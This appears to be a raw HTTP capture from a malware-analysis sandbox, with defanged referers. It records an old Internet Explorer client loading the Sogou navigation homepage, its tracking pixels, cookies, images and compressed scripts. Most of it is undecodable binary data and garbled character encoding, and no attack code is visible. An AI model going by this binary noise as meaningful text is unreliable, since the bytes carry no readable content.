.c..x,!k...u.5.&...|v*......=...9C3J3W.R..f?...q..tN..(...~....).)..4L.1e\k....X.H.Q.G..6......E.Y...A.J'\'Gg.....S.S.....M=:....k....Dw.n.....^..Lo..y....}/.T.m...G.X...$.....<.5qo<./...QC].@C.a.a......<..F.F..i.\.$.m.m..&.&!&KM.M..RM..).;L;L........5.=1.2.......
<<
<<< skipped >>>
GET /pv.gif?uigs_productid=ufo&ufoid=ads&ptype=ads&pcode=ads&rdk=1399956570071&img=extra.gif&yyid=&ssuv=&m=&loc=&module=show&tag=62 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive
Set-Cookie: SUV=0033227BC18AF4E75371A455E4AD7518; expires=Fri, 10-May-24 04:49:25 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
....
GET /pv.gif?uigs_productid=ufo&ufoid=wan&ptype=jztf2&pcode=index&rdk=1399956570103&img=pv.gif&sourcelist=0011000100006_0011000100007_0011000100008_0011000100009_0011000100010_0011000100011&titlelist=风云无åÂÅ’_仙侠é“_暗黑屠龙_Sogou傲剑2_万世_大闹天宫OL HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive
Set-Cookie: SUV=00461146C18AF4E75371A4556E6A4053; expires=Fri, 10-May-24 04:49:25 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
....
GET /pv.gif?uigs_productid=daohang&rdk=1399956570493&img=pv.gif&pars=?rand=1399956570493&suid=null&sduv=1399956570462_5852_00001&ckid=6846_00001_00000_3030_00000_00000&m=null&apid=null&sgtp=null&refer=&page=&pageUrl=http%3A%2F%2F123.sogou.com%2F%3F22014&loc=null&hp=-1&pid=Af22014&ptype=index&pcode=index&yyid=null&skin=null&ver=v53_ie6_cr__4&sys=100&ser=null&sev=null&time=3531 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
Cookie: GOTO=Af22014
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:26 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive
Set-Cookie: SUV=0066339EC18AF4E75371A4567C72F260; expires=Fri, 10-May-24 04:49:26 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
HTTP/1.1 200 OK..Server: nginx..Date: Tue, 13 May 2014 04:49:26 GMT..Content-Type: text/xml..Content-Length: 0..Connection: keep-alive..Set-Cookie: SUV=0066339EC18AF4E75371A4567C72F260; expires=Fri, 10-May-24 04:49:26 GMT; domain=.sogou.com; path=/..P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"......
GET /pv.gif?uigs_productid=ufo&ufoid=daohang&ptype=indexv53&pcode=index&rdk=1399956575900&refer=&page=æœ狗网å€导航ï¼Âï¼Â网å€大全,实çâ€Â¨Ã§Â½â€˜Ã¥Â€,尽在123.sogou.com&pageUrl=http://123.sogou.com/?22014&img=pv.gif&vcode=v53 HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: pb.sogou.com
Connection: Keep-Alive
Cookie: GOTO=Af22014; SUV=00DD04B9C18AF4E75371A458B1D10495
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 13 May 2014 04:49:30 GMT
Content-Type: text/xml
Content-Length: 0
Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx..Date: Tue, 13 May 2014 04:49:30 GMT..Content-Type: text/xml..Content-Length: 0..Connection: keep-alive..
GET /imgu/2014/05/20140507144656_823.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p9.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/jpeg
Content-Length: 5785
Last-Modified: Wed, 07 May 2014 06:46:56 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
......JFIF.............0Exif..II*.......1...............VVV.meitu.com....C....................................................................C.......................................................................=._...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....n.aw..W.....8m...K..`.v.w..!.....g..p...fu.I@.>-....l..T....N..8..X8...ji~%.......... U.`........F...{_........~2.c....U...V7.:..6o....?.....*xy3..IU.B>g......?...o..l.LQ...<.".Lo"KS,..-...QT..d..W.R.1..T....U.r.E..........S..K_...u~..?........m..KTP1sf....y..N.s....._QE..j.5....qU.h{......|#..}.... ....8...u..]F;..b.XQ...h..M9.........................j...M.4RL..{.Y.u.O<WR.i9sJ-G......~X......W.-..g..o...X...q.V..Gc._O.IJ......qj.OMD.....%....F....T..... ;.xB......L.4g.b.r.K..... ..#...X..6. .W...*.GE.s.0.f..b.&..F.e.A........y..4.GZ.....R..<Q.O.H..?.4.R...2.....U..rB.*.fb#Bs..p...8...........{Y.QS7..j......K..o^.......D...%.......`....N..@....6.L..F9.*X.V......'0.C.Y........n.C....%.........b.SN,t..]>..}.^..<...?.|....(....}'..P..&......_......^.V....'....4..J..6..q.B.{....<.&...}6a...^.............q|/..<m.?....[.......
<<
<<< skipped >>>
GET /imgn/v32/skin3.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p0.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: image/gif
Content-Length: 4159
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:25 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a..h..........R..J..Bs.S................r.....qq}a.......................n..~..|..m..l..l..x..k..v..t..i..s.xa..n..l..k.ua..i..h..i.~f.r`....wd.xd....rb....pa.nb.rf.vm.xp.xp}OJ..........l`.mb.pe.od.oe.wl.xn.qg.~t.sj.sj.tk..|..}....SM.vn............wMIuLH.|v.}wmJG.......~yeHE..|..................................................................H??.................................................................................................................................................................................................................................|||{{{zzzyyyxxxtttsssrrrpppmmmlllkkkjjj<<<..................................................................................................................................................................!.......,......h........H......*\.......H.H.....3j.....I.BJ......(S.\.....0].IdI.$K...T...O.....JTh.dH.*EZ..O....%j....J.@1.....{.@.9.R.=;..].VA.8p..ms....x.5m../..;8.......u.........#[...N!F.......g....&L.`2....T.....;vd.L8L./..g.......)..s.....]..=P......F}W.@..)....v\4=bs..}w...J|._.>.r...?..].t.......B..)T.].n....g....B.&....'!d....2.=W.2.Q..2.Y`...x....\(..I.....1.....`...L...s|...@R.......|p...].2.Bl L...#8...l<.[.e..C.o.W..6.&..2.....E....U....).ZS!....".p....%F.;....G...QZ....5.@..L.........s...^..........H..D....C.....Bu.bj ......b..d.......l.k...0F......8|Z...R.k.........A.sf...u6...wN[m.;9..TS.u.VJ5..O..k.i.......$...............p..G,....j...g....w... ..q...l..(..r.$_.qM .4.'1..J.6..r.pb<J*..<.-.............I.<
<<
<<< skipped >>>
GET /imgu/2014/05/20140512112800_851.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p0.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/jpeg
Content-Length: 18313
Last-Modified: Mon, 12 May 2014 03:28:00 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.....0Exif..MM.*.......1..............VVV.meitu.com....C....................................................................C.......................................................................k._...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......8.:.da....0N......<.3.F....J;.E~.;.u...1.._?.....s.c%..d....4k.H...T2.Y.>TG..d....q..<.W. ..5h.h.h......o...i.[......v..k..>........:...]i...um.....G..R........P.k.iZ......y.......\.n..sZ....Ws..F.X.q.p...w..]g;.....(...]..W...\-H.....c..........Z...*5..R. S.:......M........4K]?V.....].Y.x.V..x"....Vw..k...N.%.../6E..rd.i'._..e..........^..~..-.d.. .,!..b.]Y..u.G2...P.:8OiR8.=J..*.W6..s.:q.Q.J._g.Rw.b.c....'.z.}.g..........~..g...G.....[....=.v..6...$:..oq.xYt....M..........i.Z..-.m_.q...........F..R.[.S..Z.%e..QB.o...*IE)9..x.......j..p..*4*EFMS..R..(.{:...q.p..(.1..C._.......<3.GJ..!.?.....K.l....^>'..4..L...R=i.....v.m..h....N..]..&.o.....NN......Q...Q.8F..T..j8.J>..]')..R^..b.<d=.'..Z1...qT........j........R.j. .'...[......!.6~..?.>.k?o.....>(.aZ.h...u=KA.Dy..ck.j.....V:......Y.....K5.........4.H..%/f..7z5.%...$....a<\...l....
<<
<<< skipped >>>
GET /imgn/v32/setskinbg.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p3.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:26 GMT
Content-Type: image/gif
Content-Length: 397
Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:26 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GIF89a.......................................................................................................!.......,............%.di.Y..l.bp,.tl.x..x.....G)....q.l:...dJ.Z...v..z...xL.....z.n....|N.....~............................\...........................................................................................................H......:X......#Jd......3j...".. C..I....(G.FX.....,C..;HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:26 GMT..Content-Type: image/gif..Content-Length: 397..Last-Modified: Wed, 20 Jun 2012 04:23:24 GMT..Connection: keep-alive..Expires: Thu, 12 Jun 2014 04:49:26 GMT..Cache-Control: max-age=2592000..Accept-Ranges: bytes..GIF89a.......................................................................................................!.......,............%.di.Y..l.bp,.tl.x..x.....G)....q.l:...dJ.Z...v..z...xL.....z.n....|N.....~............................\...........................................................................................................H......:X......#Jd......3j...".. C..I....(G.FX.....,C..;....
GET /imgn/sehome/tjv1/new-ico.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p3.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/png
Content-Length: 211
Last-Modified: Mon, 28 Jan 2013 11:52:04 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR.............&P......sBIT.....O.....PLTE...???.Mv.....tRNS..[.".....pHYs.........B.4.....tEXtCreation Time.12/28/12...5....tEXtSoftware.Adobe FireworksO..N....IDAT..c` .H..!...2.1_.......IEND.B`.....
GET /imgn/v51/i-ico-2b.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p3.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/png
Content-Length: 2337
Last-Modified: Thu, 30 May 2013 07:28:54 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR..._...X......I M....sBIT....|.d.....pHYs.........B.4.....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.12/28/12...5...}IDATx...{l[...?..y4MH.'$kIXJIE.H.^K.2...d06p.44.m.4..tb....m...ib..aM.....Tk......#{....P......m.&n..}}...ul...~..J.G..{..]..=?...>...HlA.......F..6"...K....^lG.#.#_6@..)...(.9.|...#g..E9...,Gr._._\,././>.rm.6.$.F..6"...)..H.m..........,G2.5[...w...0.. .UX..pi.....O...;%.sI.V..?~.}.e.#3.Q}..B..W.L..I}..}....4.4..{..k73....5"_.A.h(..PH..<J..O(.vv.a*.c.n..5.H.5.. ..U.m5.e8.....r....._.....A.5.._.s...eJHc.c.%uv..@|..^!....0.XC.|:\Y2G."..............F..&.-._......T.qel.4...~r...o......$..gI. ..=.K*S/...v.\./......o...~..jv...n)|.d=.R......:.....(.3=...C)|..g.lD.j..........y......-..p...,.C_....Y......P.....;...:p...@{.~..u...[3Up..M........&...V.Y:..N..`66.......,.....J.....'R......6.........)....c..K.../..........)..s[.r.h...)N.U .......F9=.d..*>...l.q.}....A....0....../V......3.wy|..........q:.....s.w.'.r. .C..wh|...K...g...e...3.H...].<......].Iu.....x...f..{......7"......;...........k...`=..D.:.7.fu.....T......`r:...Yy.... .1....a^...o......A.cJL......}.4c...oIT.9...!........k.....U....a&....H..]D....@..........63...$.....R'.}.#._N)....8.|..L..<pON9....F.....j*....`|j.....y].........h..p'..y...O.....$.X........~......S....:.yF~"o.7.$x"......2..Ss~.t....B.......l.&.[....s$..4.#....W.....ho^..........T.c.K ....&./"..)../.}...h..!^ "u.r..j....G....E./Mg...$..LF; .>_.......9.~DZ1..<.<gb.......6...e..3..TA....-.F.>..==.....o.p......J.<..nG.%.
<<
<<< skipped >>>
GET /imgu/2013/05/20130531144119_126.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p2.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/png
Content-Length: 13613
Last-Modified: Fri, 31 May 2013 06:41:19 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
.PNG........IHDR.......2.............pHYs................MiCCPPhotoshop ICC profile..x..SwX...>..e.VB....l.."#....Y....a...@....V....HU....H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0..>.3.o..~..@...z..q.@......qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N....l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A..............a.D@.$.<.B........A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R...J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6..l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......)..k.f....t...,.......9..k.a........E..J.6.....|...M....V>VyV.V
<<
<<< skipped >>>
GET /imgu/2014/05/20140507144124_693.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p2.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:32 GMT
Content-Type: image/jpeg
Content-Length: 5054
Last-Modified: Wed, 07 May 2014 06:41:24 GMT
Connection: keep-alive
Expires: Thu, 12 Jun 2014 04:49:32 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
......JFIF.....`.`.....0Exif..II*.......1...............VVV.meitu.com....C....................................................................C.......................................................................=._...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...h..O>..y0...Dq...(....z..QWl..9Y......g.Ry...Z..k...ib.......6....?......1/.2...#x.....~...........k ........u![.w.2.......`.....5.........q..|e...<....g.4....R[m.W....V.Gp`..F.~lg.R.J.eI.'....%..H.M7..{t...D.......q%.[..u%\..I......e..a.....yP...]H...F..6.L..6......{...)G@.9sY...F.].>....%............OS..`.p..y.%.iO.Z.NJQrg.y.....O...2.\..V{{....B..?J.p....4..p...0..........x.\.....#.Wr....Uj.....@.[...8...W..B1.s....u.G._..?....]...).k....6|M._..3.z...U.A.iZM.............1...k.....?...(o..?.....MP|..E..|..I-....>[.....c.$~.< 8...4.j.2..%.~....J....z..3..................W.....~..H#s...L...8A.*.....WC......\..Z...5..f..,.......U...N.\e.Q-..3\$...y8?qB..n0y.1\=.J......kO....n:.T\...g.......0.?i/.E....!.|C>..zF...m..L........z.28...b*V.UwZhz..P.U(..>.._...|F.....|1...e..{-J.f....#.../s...X.....#.&..i..x/...l..#K.......Y.kg.HUWr.T.
<<
<<< skipped >>>
GET /jsn/citydata.js HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogou.com
Connection: Keep-Alive
Cookie: ipt=0; SDUV=1399956570462_5852_00001; CKOR=6846_00001_00000; CKOD=3030_00000_00000; GOTO=Af22014
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:25 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 19 Sep 2012 10:54:17 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
5c2b............m.Yo[I...W.t..o{......'7............-.[.Z6EJ.G..(R.G....gK...(w..~-.g..._:....U.j..U.V.........._....o....?.........?.s...........s.......wZ......4Y^..K....>..e.n.nv.[@..v..<.o.].S....>.....]d...4..LU]...7S..9...d.z.2........*..U..T..x~.y.&.!.3...x......y....y....%.Y.W........S.s.yv. ,.2.,.M..7..k9=..|....WT..........>g.......7..M>'..F..~_......~_...Q.>.3.Lssk.....M.....b......q5......Bx.6.c0......{........z...T./...-...........2.,<..(..pExy>..U....x..)..In..0.Q8;.P...*.........q.Y.........X..=...Y_9..bl.w?m.16........~....xw.l\....~..L7.{...l.6C..v.`M....n..%..F......O.~......Y....fl...R....O....f..P.........'........ly%...\.L...9..\..a..=.V.....u3...........W.......f.Fm..B:....?.?T..q........m.].LFj....~..Lwq..C......M.Y..6.K......T.....FT..l..P....m....n...}..fl.r.b....5...XQtGT..).h.bG..\ao....tg.m...@w.....ql.2.#..xffA]...v......I)/\...v'....:..........q....Z..)...Z.rK..8.zV.F.....n.....r&;..n.q.......6...H..i=.-.&.5.Msu..,.........b...r..KY9.......J...Q.8.....bl..P...s.<.|...n......5..G.j.....9.k,..R.e.%k...0..L.%....5.E...g.].1.y..G........H........a/..-U.,6k.< .b......U.#.k.....#...<...........z.*.w.........-.z.V.............v.m....%z...m..,......h..6..7...../.h..6....k..:JV.z.R.....0.@.....KA..5Y....#=hH6p..,..........CLo~r.Fl~F_..TT.....P...G..&.~...i.z......M:a....;..r..~3b..... .......}.g.\c...AL..L.l..w..]...9...].=j=........X.2|alV....W........[b..zyc.Z... .......K2...\..X-..........0.D0~50^..*]........l..Y...f{..<$`K8.8Q..........l.....[.(O.}5..
<<
<<< skipped >>>
GET /v53/imgn/v53_bicos.gif HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:23 GMT
Content-Type: image/gif
Content-Length: 826
Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT
Connection: keep-alive
Accept-Ranges: bytes
GIF89aD.......Bo...v..1..;o..........f...W.......;........e...W.d..............@......`..P~%s.......@..G.....O..j......g.r......L{......Z......W.%h.t...d................@..&z..Hv......L...\.Q~..R....6............h..Ky...y..Y..Cp..a...........R.....Z.....Cr.c..........:......o.......$m..f....&}.......................................................................................................!....._.,....D......._..............@'K3@?...0 0...''@...'....0......KK.3$.;=3........'*K??G..CCH8........?'/E.?6.&.LZ..........@3.2.E&&LLN.T@@.. .. .mXR.....7(a. ...4>.[.c@..-..X.)...?.n..e...4P...H...R.H......P........4..dY...'..f..d@.D..D......?F)..!....BX...A......1.^.... u@..,!_9..{.c@0D.....0J....tHr..]A.~..7`....N......!J...pb..AF.L....._O..;....!]..#2...AF.H.. .4#.~D.b%.....,.... .h..p.DP.W.......o..><0.K..{.O.@Q .;t>....
GET /v53/imgn/foot_slider.jpg HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:24 GMT
Content-Type: image/jpeg
Content-Length: 322
Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT
Connection: keep-alive
Accept-Ranges: bytes
......JFIF.....H.H.....C....................................................... ...C................ ........................................................................S.........................................................?......>....('@......... . ..@....HTTP/1.1 200 OK..Server: nginx/1.4.1..Date: Tue, 13 May 2014 04:49:24 GMT..Content-Type: image/jpeg..Content-Length: 322..Last-Modified: Thu, 14 Nov 2013 11:00:56 GMT..Connection: keep-alive..Accept-Ranges: bytes........JFIF.....H.H.....C....................................................... ...C................ ........................................................................S.........................................................?......>....('@......... . ..@........
GET /v53/jsn/main.js?V=16bb90f6b3db269d3b0dadfb85d67a51a HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:28 GMT
Content-Type: application/x-javascript
Last-Modified: Wed, 12 Feb 2014 04:41:53 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
54c0..............{[.G...w.... Y-!q.....0...${..I^`xuiI.BR....:.......H.;.......?.....Z.n.j....p}=..L.....8.u....h.O....;a7....x..X..D...]z.@..O..@..S..0..i.9...|^....8......X.........!_G......a....\.W....9..P.O..$.'..^..~H7.....Gww.0~./...2.e..,.....*H>.. f_}... Z^..f.U.d....b.....C?..............LJx.....~4 .!...x6.._?,.....<.LC..(......I..&..$m4l...'......a[0.d2i~J.n...I.V..........a.\z....bx1....va...[7a.6....v..aj..!...j-..D<..V?...~T.#....e)tfw.....R.......>.eh [s....(..g.w../g.N../g.{.v.g;.........W{........r......~...{a.#.....V8)....&a..@k....j9.>......y>{.M..]..tkoN.K.n|....z...........]..v..........-z.z..-............`.kj.9;..H.N......~.L .o. O.7.hXd@9X..zv....{vN..N.........m._.....qv...`.A..p<h.....;........ ....6....9..v.u..A9A-o..'...0./...J)&..as..~.....c0....e...y.o.|..?.u.K.\.%.r............^.S.|W..,.....}W.*..].U/}bi..].....%....^......wCv.2f..e....\...8.....aB.....5!l.....}.*...x.lI.. .n... ,....<..5..9^.5h...QZ...FP......Y.CW.@x.N.k........./.....5...>D..5.[.2....j..g.J...|......mY.y.........x..........`.7'..0.iI...t<....z\..,..]....J..h.....R..25......t..K'q#.....N...f...O..a3L.....A..:......b.. .j=....6.....Z'.,....\.\D.....ah%.w....8e.n.....qhh..x.....!4.....(.c......8<5..1..CH......qq.N........e...r~Y.,]V/./.u..Lr...LA.f.....!0.z..X..... ..fd....u&B......qy..3p.".f&<.B|s.....v%^...]......p..........<.s.V.Kb....r<Q|.x..w,.a.Xr....f.147a...J./7.........(5..p4....*o...F..yC.h*}.5.~H.q..`kd.?|<Z9u....z... >...z..y.C]O....<.N!...<M@.@B6.,d.
<<
<<< skipped >>>
GET /v53/imgn/guide_tip.png HTTP/1.1
Accept: */*
Referer: hXXp://123.sogou.com/?22014
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: d.123.sogoucdn.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Tue, 13 May 2014 04:49:30 GMT
Content-Type: image/png
Content-Length: 10442
